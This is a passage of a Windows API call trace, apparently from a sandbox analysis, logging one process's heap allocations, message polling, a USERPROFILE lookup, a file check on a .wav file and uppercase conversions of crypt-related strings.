RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.701] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0243.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0243.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.748] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0243.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0243.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0243.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0243.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0243.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0243.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0243.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0243.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0243.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0243.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0243.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0243.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0243.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0243.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0243.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0243.755] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44131840, ftCreationTime.dwHighDateTime=0x1d5e7fa, ftLastAccessTime.dwLowDateTime=0xee597e70, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0xee597e70, ftLastWriteTime.dwHighDateTime=0x1d5efb1, nFileSizeHigh=0x0, nFileSizeLow=0x14dee, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="DePu.wav", cAlternateFileName="")) returned 0xa87550 [0243.755] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.757] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0243.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0243.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0243.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0243.758] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0243.759] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.759] PeekMessageW 